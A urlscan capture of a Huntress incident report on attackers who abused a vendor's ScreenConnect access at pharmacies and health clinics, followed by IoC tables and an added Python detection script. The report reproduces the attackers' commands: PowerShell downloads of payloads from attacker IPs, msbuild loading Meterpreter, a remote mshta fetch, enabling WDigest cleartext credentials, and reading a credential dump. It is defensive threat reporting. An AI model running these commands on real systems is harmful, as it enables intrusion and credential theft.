www.huntress.com
2606:2c40::c73c:67e4
Public Scan
URL:
https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack
Submission: On November 13 via api from TR — Scanned from DE
Text Content
Team Huntress 11.9.2023

BITTER PILL: THIRD-PARTY PHARMACEUTICAL VENDOR LINKED TO PHARMACY AND HEALTH CLINIC CYBERATTACK

In a concerning development within the healthcare sector, Huntress has identified a series of unauthorized access events that signify internal reconnaissance and preparation for additional threat actor activity against multiple healthcare organizations.

The attackers abused a locally hosted instance of a widely used remote access tool, ScreenConnect (utilized by the company Transaction Data Systems, which recently merged with and was renamed Outcomes, the makers of Rx30 and ComputerRx software), for initial access to victim organizations. The threat actor proceeded to take several steps, including installing additional remote access tools such as ScreenConnect or AnyDesk instances, to ensure persistent access to the environments.

OVERVIEW

In this article, there are multiple ScreenConnect instances at play; there are a total of four instances observed, across two endpoints, from completely distinct organizations (i.e., not the same company, not managed by the same MSP, geographically separated, etc.). One of those ScreenConnect instances appeared and was used by the threat actor on both endpoints.

There were similarities in tactics, techniques, and procedures (TTPs) across both endpoints, as well as multiple intersections in indicators of compromise (IOCs). Specifically, one ScreenConnect instance (instance B) was observed being actively used on both endpoints, the “[redacted 1]” account was observed being used to access both endpoints via ScreenConnect, and the file test.xml was downloaded to both endpoints via PowerShell.
ENDPOINT 1

Endpoint 1 is a Windows Server 2019 Standard system within an infrastructure in the pharmaceutical field. Log data allowed the Huntress team to ‘see’ as far back as August 9, 2023, where the team observed ScreenConnect instance A being accessed via an account named “[redacted 1]”. There were repeated “Connected” and “Disconnected” messages for the account until the file ConnectWiseControl.ClientSetup.msi was downloaded and launched, installing ScreenConnect instance B on the endpoint.

Then, beginning on August 10, 2023, the “[redacted 1]” account was used to access the endpoint via ScreenConnect instance B. There were several pairs of “Connected” and “Disconnected” messages in the logs for the “[redacted 1]” account until October 28, 2023.

On October 28, the “[redacted 2]” account was used to access ScreenConnect instance B, and run the following PowerShell command:

powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://2.57.149[.]103/a.msi', 'C:\Users\Administrator\Documents\a.msi') }"

The a.msi file was launched via MsiExec.exe, installing ScreenConnect instance C on the endpoint, connecting to IP address 45.66.230[.]146 via port 8041. Shortly after the installation completed, the “[redacted 2]” account disconnected from ScreenConnect instance B.

Two days later, on October 30, ScreenConnect instance C was used to run the following PowerShell command:

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://119.91.138[.]133:443/test.xml', 'c:\programdata\test.xml')"

Almost 20 hours later, on October 31, ScreenConnect instance B was used to run the following command:

C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\programdata\test.xml

The payload, test.xml, consists of C# code forking the publicly available nps project for detection evasion and process execution.
As designed, the payload attempts to load a Metasploit Meterpreter instance in memory, but antimalware protections on the system identified and attempted to terminate execution. However, this does not appear to have succeeded, as additional processes were observed being launched via the Printer Spooler service, spoolsv.exe. For example, the following processes were observed being run:

nslookup myip.opendns[.]com. Resolver1.opendns[.]com

powershell -command "Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | Sort IPv4Address | FT Name, ipv4*, oper*, LastLogonDate -Autosize"

C:\Windows\system32\cmd.exe /S /D /c type C:\Windows\System32\mimilsa.log | findstr /V Mailbox

ENDPOINT 2

Endpoint 2 is also a Windows Server 2019 Standard system, within an infrastructure in the healthcare field. Log data illustrates that ScreenConnect instance B (the same “instance B” observed on endpoint 1) was installed and actively being connected to via the “[redacted 1]” account as of November 8, 2022.

On November 1, 2023, the file s.msi was transferred to the endpoint via the ScreenConnect instance; launching this file led to ScreenConnect instance D being installed on this endpoint, with the instance configured to connect to 185.12.45[.]98 on port 8041.

It was clear that ScreenConnect instance B was still running and accessible on the endpoint; on November 5, 2023, an error message indicated that the instance attempted to connect to the configured endpoint, and a DNS Client message was observed indicating that the configured endpoint could not be resolved.

On November 6, the following PowerShell command was run via ScreenConnect instance D:

powershell -Command $wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://119.91.138[.]133:443/test.xml', 'c:\programdata\test.xml')

The use of msbuild.exe to compile the file and launch the payload was not observed on this endpoint.
However, four hours later, the following PowerShell command was run, also via ScreenConnect instance D:

powershell -Command $wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://bashupload[.]com/PXYpf/a.msi', 'c:\programdata\a.msi')

This file was launched via msiexec.exe, installing the “AnyDeskMSI Service”. However, about a minute and a half after being launched, this service was stopped via taskkill.exe.

Approximately four hours later, the threat actor made multiple attempts to create the “manager” user account and add the account to the local Administrator group on the endpoint. Once their efforts were successful, the threat actor logged out, then logged back into ScreenConnect instance D via the newly created account, and then used that instance to transfer and launch the file Advanced_IP_Scanner_2.5.4594.1.exe.

Finally, the threat actor was observed running the following commands:

mshta http://119.91.138[.]133:9999/5E1Ch

taskkill /F /IM mshta.exe

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

SCREENCONNECT INSTANCE B

ScreenConnect instance B, found on both endpoints and accessed via the “[redacted 1]” account, per the user.config file retrieved from one of the endpoints monitored via Huntress, is tied to rs.tdsclinical[.]com. The observed domain is legitimate and associated with Transaction Data Systems (now named Outcomes).

At this time, Huntress cannot identify whether Transaction Data Systems itself has been breached, if credentials for a legitimate Transaction Data Systems-associated employee or user have been leaked, or if some other mechanism was involved tying their remote management of these clients to subsequent threat actor abuse.
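The command lines reported on the two endpoints above can be expressed as behavioural checks over process-creation telemetry. The Python below is an added example, not Huntress code: the event layout, host names, rule names and benign events are constructed, the malicious command lines are copied from the article (defanged as published), and it assumes the identifier in the ScreenConnect client folder name is the instance ID given in the article's IoC table.

```python
import re

# ScreenConnect instance IDs from the article's IoC table.
KNOWN_INSTANCES = {
    "adf02e34cba839d2": "B",
    "e3e2410d655306ff": "C",
    "4974c38508ef2b18": "D",
}

# Rule names are hypothetical; patterns generalise the article's command lines.
RULES = {
    "webclient_download_to_staging_dir": re.compile(
        r"Net\.WebClient.*DownloadFile\(.*\\(programdata|documents)\\\S*\.(msi|xml|exe)", re.I),
    "msbuild_runs_xml_from_programdata": re.compile(
        r'msbuild\.exe"?\s+"?[a-z]:\\programdata\\\S+\.xml', re.I),
    "mshta_remote_url": re.compile(r'\bmshta(\.exe)?"?\s+"?https?://', re.I),
    "wdigest_cleartext_enabled": re.compile(
        r"\breg(\.exe)?\s+add\s+\S*\\WDigest\s.*UseLogonCredential.*/d\s+1\b", re.I),
    "reads_mimilsa_log": re.compile(r"\\mimilsa\.log\b", re.I),
}

# Assumption: the folder's "<unique identifier>" is the 16-hex-digit instance ID.
INSTANCE_RE = re.compile(r"ScreenConnect Client \(([0-9a-f]{16})\)", re.I)


def sc_parent(instance_id):
    """Build the ScreenConnect client service path given in the article."""
    return (rf"C:\Program Files (x86)\ScreenConnect Client ({instance_id})"
            r"\ScreenConnect.ClientService.exe")


def triage(events):
    """Return one finding per event whose command line matches any rule."""
    findings = []
    for ev in events:
        hits = [name for name, rx in RULES.items() if rx.search(ev["cmdline"])]
        if not hits:
            continue
        m = INSTANCE_RE.search(ev.get("parent", ""))
        inst = m.group(1).lower() if m else None
        findings.append({"host": ev["host"], "rules": hits, "instance_id": inst,
                         "ioc_instance": KNOWN_INSTANCES.get(inst)})
    return findings


# Constructed events: host names and parent/child layout are illustrative only.
SAMPLE_EVENTS = [
    {"host": "EP2", "parent": sc_parent("4974c38508ef2b18"),
     "cmdline": r"powershell -Command $wc = New-Object System.Net.WebClient; "
                r"$wc.DownloadFile('http://119.91.138[.]133:443/test.xml', 'c:\programdata\test.xml')"},
    {"host": "EP1", "parent": sc_parent("adf02e34cba839d2"),
     "cmdline": r"C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\programdata\test.xml"},
    {"host": "EP1", "parent": r"C:\Windows\System32\spoolsv.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /S /D /c type C:\Windows\System32\mimilsa.log | findstr /V Mailbox"},
    {"host": "EP2", "parent": sc_parent("4974c38508ef2b18"),
     "cmdline": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "
                r"/v UseLogonCredential /t REG_DWORD /d 1 /f"},
    {"host": "EP2", "parent": sc_parent("4974c38508ef2b18"),
     "cmdline": r"mshta http://119.91.138[.]133:9999/5E1Ch"},
    # Benign, constructed: unknown instance running a routine command.
    {"host": "EP3", "parent": sc_parent("0123456789abcdef"), "cmdline": "ipconfig /all"},
    # Benign, constructed: developer build of a project file.
    {"host": "EP3", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\src\app\app.csproj"},
    # Benign, constructed: WDigest cleartext caching being turned off.
    {"host": "EP3", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "
                r"/v UseLogonCredential /t REG_DWORD /d 0 /f"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Findings that carry an `ioc_instance` label tie the behaviour to one of the published instance IDs; a rule hit with no label still warrants review of the parent process.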
TECHNICAL INDICATORS OF COMPROMISE (IOCS)

Huntress has identified and urges immediate action upon the following IoCs:

NETWORK OBSERVABLES

| IP Address | Hosting Provider | Hosting Location | Function |
| 119.91.138[.]133 | Tencent Computer Systems | CN | Primary infrastructure for storing and retrieving post-access payloads |
| 185.12.45[.]98 | Private Layer Inc | PA | Connecting server associated with malicious ScreenConnect instance D |
| 45.66.230[.]146 | Delis LLC | NL | Connecting server associated with malicious ScreenConnect instance C |
| 2.57.149[.]103 | Red Byte LLC | PL | Hosting server for AnyDesk MSI installation |

ASSOCIATED FILES & PAYLOADS

| Name | SHA256 | Function |
| test.xml | 9f42bf3a61faaab8f86abb3c7f9db417bffb3474a55169a4efb1d2386545e4e8 | C# payload designed to load Meterpreter into victim memory |
| a.msi | 70f865a7f8a01356685b17abdf6ac738e9a9098f1ae2d5a34cfa3610cb28fc56 | AnyDesk MSI installer |
| s.msi | 8c3b4febe58df0a01126d78109f52035d34a4e03f02b5d4fca3e4d94f3f657b3 | ScreenConnect MSI installer |

SCREENCONNECT INSTANCE IDS

| ScreenConnect Instance ID | Description |
| adf02e34cba839d2 | ScreenConnect instance ID B, associated with rs.tdsclinical[.]com |
| e3e2410d655306ff | ScreenConnect instance ID C, associated with 45.66.230[.]146 |
| 4974c38508ef2b18 | ScreenConnect instance ID D, associated with 185.12.45[.]98 |

FILE PATHS AND NAMES

* C:\programdata\a.msi
* C:\programdata\test.xml
* C:\Users\Administrator\Documents\a.msi
* S.msi
* C:\Users\manager\Documents\ConnectWiseControl\Files\Advanced_IP_Scanner_2.5.4594.1.exe
* C:\Program Files (x86)\ScreenConnect Client (<unique identifier>)\ScreenConnect.ClientService.exe

ADDITIONAL OBSERVABLES

While researching this event, Huntress analysts identified an open directory on 2.57.149[.]103, shown in the following figure:

In addition to a.msi, the AnyDesk installer previously discussed, two additional files were located:

* b.msi (f28ee671c0f894154dd8c145f2b6b819b63348c785a682f60f37529a2aae174e): another ScreenConnect client installer.
* t.zip (ba8521ef14f1ec09f0bcb8f490e30322ca4eb84fa0013ee3bbe9c6a24866d334): an archive containing three additional payloads:
  * WinPcap_4_1_3.exe (fc4623b113a1f603c0d9ad5f83130bd6de1c62b973be9892305132389c8588de): a legitimate WinPcap version 4.1.3 executable.
  * Masscan64.exe (174f91806e8bc1c0dea24192f7d4afcefc40a1731827b32939d4f411e8402d75): a compiled version of the Masscan TCP port scanner.
  * veeam.exe (45c8716c69f56e26c98369e626e0b47d7ea5e15d3fb3d97f0d5b6e8997299d1a): an executable containing code to exploit CVE-2023-27532 in Veeam software, disclosed in March 2023.

The IP in question appears to be a tool repository for threat actors, although the lack of observations on b.msi and payloads in t.zip in monitored environments makes its association with the ScreenConnect incidents uncertain. However, the payloads in question match overall observed behaviors in terms of remote access tool installation (b.msi) and payloads associated with system survey (masscan64.exe) and data capture (WinPcap_4_1_3.exe). The outlier is veeam.exe, as all other observed activity indicates a combination of credential capture or reuse with living-off-the-land techniques or abuse of legitimate software.

MITIGATION GUIDANCE

Pharmacies and other healthcare organizations that may be clients of Transaction Data Systems/Outcomes should immediately examine their systems and networks for the above IoCs. Any discovery of these should be taken seriously and investigated promptly. Given the potential implications of such a breach in the healthcare industry, particularly regarding patient data, privacy, and availability of critical services, a comprehensive response is essential.

> IF YOU’D LIKE TO HAVE SOMEONE ELSE WATCHING YOUR BACK WHILE YOU WORK ON
> SCOPING YOUR ENVIRONMENT, START A FREE TRIAL WITH US SO OUR 24/7 SOC CAN KEEP
> AN EYE OUT FOR YOU.
It's imperative for organizations within the healthcare domain to recognize the gravity of such intrusions and take concerted steps to safeguard their infrastructure. Enhanced endpoint monitoring, robust cybersecurity frameworks, and proactive threat hunting are no longer optional but a necessity in the face of such sophisticated cyber threats.

OUTREACH TO TRANSACTION DATA SYSTEMS/OUTCOMES

In our effort to respond responsibly to this situation, we have made several attempts through various channels to contact Transaction Data Systems (now Outcomes) to communicate our findings and offer support in addressing these incidents. We have not yet been able to engage with their team. We remain open and ready to collaborate for the safety and security of all parties involved.